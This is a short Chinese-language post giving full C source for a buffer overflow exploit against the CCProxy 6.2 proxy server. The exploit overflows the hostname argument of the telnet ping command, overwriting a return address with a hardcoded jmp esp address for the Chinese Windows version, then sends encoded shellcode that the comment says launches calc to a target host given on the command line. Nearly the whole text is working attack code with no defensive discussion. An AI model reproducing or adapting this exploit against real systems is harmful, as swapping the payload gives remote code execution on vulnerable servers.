CCProxy缓存区溢出攻击代码
针对CCProxy6.2的一个缓存区溢出漏洞(telnet到CCProxy服务器,当执行ping命令主机名输入超过1012字节时),实现Shellcode的代码注入。
#include <stdio.h>#include <stdlib.h>#include <windows.h>#pragma comment (lib,"ws2_32")// jmp esp address of chinese version#define JUMPESP "\x12\x45\xfa\x7f"// exec calcchar shellcode[] = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49""\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42""\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32""\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a""\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c""\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57""\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50""\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d""\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f""\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a""\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76""\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65""\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78""\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f""\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65""\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d""\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31""\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69""\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61""\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70""\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";void main(int argc, char *argv[]){ WSADATA WSAData; char Buff[3008],Recv[1024]; int nRet; struct sockaddr_in ipAddress; SOCKET s; if (argc < 3) { fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]); exit(1); } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("[-] WSAStartup failed.\n"); WSACleanup(); exit(1); } s = socket(AF_INET,SOCK_STREAM,0); ipAddress.sin_family = AF_INET; ipAddress.sin_addr.s_addr = inet_addr(argv[1]); ipAddress.sin_port = htons(atoi(argv[2])); connect(s,(struct sockaddr *)&ipAddress,sizeof(ipAddress)); memset(Buff, 0x90, sizeof(Buff)-1); // NOP 填充 memcpy(&Buff[0],"ping ",5); memcpy(&Buff[3005],"\r\n\0",3); // sizeof("ping ")+3000=3005 memcpy(&Buff[1017], JUMPESP,4); // sizeof("ping ")+1012=1017 memcpy(&Buff[19], shellcode,sizeof(shellcode)-1); // sizeof("ping ")+4=9 memset(Recv,0,sizeof(Recv)); //010b670b recv(s,Recv,sizeof(Recv),0);//ef4686ab 0129670b nRet=send(s,Buff,sizeof(Buff),0); Sleep(1000); WSACleanup();}